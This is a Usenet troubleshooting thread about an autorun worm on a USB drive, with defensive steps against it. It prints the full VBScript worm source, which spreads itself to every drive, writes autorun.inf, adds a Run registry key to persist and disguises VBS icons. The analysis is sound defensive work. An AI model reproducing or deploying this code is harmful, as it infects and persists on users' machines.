Do you see any Autorun.inf file on this Volume ?
Can be Hide ans System, see Folders Options.
Or in a Console (Start>Run>cmd) :
attrib -h -s -r F:\autorun.inf
(assuming your external drive is F)
Rename Autorun.inf to Autorun.txt and copy the text here.
Thanks.
Example of a bad Autorun.inf ==>
[AutoRun]
open=xn1i9x.com
shell\open\Command=xn1i9x.com
shell\explore\Command=xn1i9x.com
More informations :
http://www.google.com/search?q=xn1i9x.com
Protections :
Tell the system to not read Autorun.inf
http://www.google.com/search?q=IniFileMapping+Autorun.inf
Avoid using a PC with administrator privileges.
So autorun.inf is ignored.
Check every drive for virus and so.
To protect a volume, you can create a FOLDER named autorun.inf
Make it Hide, System ans ReadOnly :
F:
attrib +h +s +r autorun.inf
Then it will be difficult to write a new FILE with that name.
--
Regards, Jean-François
"JF" <JF@-> wrote in message news:uUVc8XaA...@TK2MSFTNGP05.phx.gbl...
> Thanks, but there is no autorun.inf file
Start>Run>regsvr32 /i shell32
Check these (by default) Values which must be equal to "none"
HKCR\Directory\shell (by default)=none
HKCR\Drive\shell (by default)=none
--
Regards, Jean-François
Found it.
This is what is says in notepad:
[autorun]
shellexecute=wscript.exe pagefile.sys.vbs
"JF" <JF@-> wrote in message news:exxo4BbA...@TK2MSFTNGP02.phx.gbl...
> Thanks,
> Found it.
> This is what is says in notepad:
> [autorun]
> shellexecute=wscript.exe pagefile.sys.vbs
Very well, thank you for the feed-back.
Wscript.exe is a command to execute scripts.VBS
c:\PageFile.sys is your paging file.
But pagefile.sys.vbs is a script which attend to be seen as a legal
system file (ask for every extension in Folders Options).
Did you find this pagefile.sys.vbs somewhere on your drives ?
It should be on F:\ or C:\ or
c:\windows or
c:\windows\system32
A script is some text.
You can rename it as pagefile.sys.vbs.txt
And copy here the text. Thanks !
--
Regards, Jean-François
'kuciapka tu byl
on error resume next
dim ksource,winpath,kflash,kfs,kmf,katrib,kuc,rgpath,nt,check,sado
katrib="[autorun]"&vbcrlf&"shellexecute=wscript.exe pagefile.sys.vbs"
set kfs=createobject("Scripting.FileSystemObject")
set kmf=kfs.getfile(Wscript.ScriptFullname)
dim text,size
size=kmf.size
check=kmf.drive.drivetype
set text=kmf.openastextstream(1,-2)
do while not text.atendofstream
ksource=ksource&text.readline
ksource=ksource&vbcrlf
loop
do
Set winpath=kfs.getspecialfolder(0)
set kuc=kfs.getfile(winpath&"\pagefile.sys.vbs")
kuc.attributes=32
set kuc=kfs.createtextfile(winpath&"\pagefile.sys.vbs",2,true)
kuc.write ksource
kuc.close
set kuc=kfs.getfile(winpath&"\pagefile.sys.vbs")
kuc.attributes=39
for each kflash in kfs.drives
If (kflash.drivetype=1 or kflash.drivetype=2) and kflash.path <> "A:" then
set kuc=kfs.getfile(kflash.path&"\pagefile.sys.vbs")
kuc.attributes=32
set kuc=kfs.createtextfile(kflash.path &"\pagefile.sys.vbs",2,true)
kuc.write ksource
kuc.close
set kuc=kfs.getfile(kflash.path&"\pagefile.sys.vbs")
kuc.attributes=39
set kuc=kfs.getfile(kflash.path&"\autorun.inf")
kuc.attributes=32
set kuc=kfs.createtextfile(kflash.path &"\autorun.inf",2,true)
kuc.write katrib
kuc.close
set kuc=kfs.getfile(kflash.path &"\autorun.inf")
kuc.attributes=39
end if
next
set rgpath=createobject("WScript.Shell")
rgpath.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSRegInfo",winpath&"\pagefile.sys.vbs"
rgpath.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sado=createobject("Wscript.shell")
sado.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
"JF" <JF@-> wrote in message news:%238bVNie...@TK2MSFTNGP06.phx.gbl...
1. C:\pagefile.sys.vbs
2. C:\pagefile.sys
"JF" <JF@-> wrote in message news:%238bVNie...@TK2MSFTNGP06.phx.gbl...
> Sorry, forgot to mention that I found these two files:
> 1. C:\pagefile.sys.vbs
> 2. C:\pagefile.sys
Thank you, this is very interesting.
1 = malware
http://www.google.com/search?q=pagefile.sys.vbs
2 = legal system file
For your information my anti-virus screamed
and your message appear now (for me) with this title :
Sujet : [avast! - INFECTED] Re: Unable to double click on external
Drive
I cannot find for now what is the instruction which alert Avast.
Somebody knows ?
Question :
Do you have any anti-virus ?
http://www.google.com/search?q=Avast!+VS+Antivir
--
Regards, Jean-François
> Sujet : [avast! - INFECTED] Re: Unable to double click on external Drive
> I cannot find for now what is the instruction which alert Avast.
This part of code is the cause of the alert :
rgpath.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSRegInfo",winpath&"\pagefile.sys.vbsANTIVIRUSALERT"
rgpath.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
I added ANTIVIRUSALERT to be quiet with Avast.
winpath represent Windows folder.
The key Run\MSRegInfo does not exist normaly, and is created by the
script. So it is a good idea to google it
http://www.google.com/search?q=Run%5CMSRegInfo
This is the 2 commands together which wake up Avast
... Run\MSRegInfo",winpath&"\pagefile.sys. vbs"
... rgpath.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
This second command give a false icon to the VBS files so they are seen
as innocent text files.
--
Regards, Jean-François
Could be as simple as a bad mouse.
"JF" <JF@-> wrote in message news:exxo4BbA...@TK2MSFTNGP02.phx.gbl...
>>>> Do you see any Autorun.inf file on this Volume ?
>>>> Can be Hide ans System, see Folders Options.
>>> Thanks, but there is no autorun.inf file
>> Start>Run>regsvr32 /i shell32
>> Check these (by default) Values which must be equal to "none"
>> HKCR\Directory\shell (by default)=none
>> HKCR\Drive\shell (by default)=none
> Thanks,
> I now am able to double click.
> Good work!
Thank you again for the feed-back.
Bonne continuation !
--
Regards, Jean-François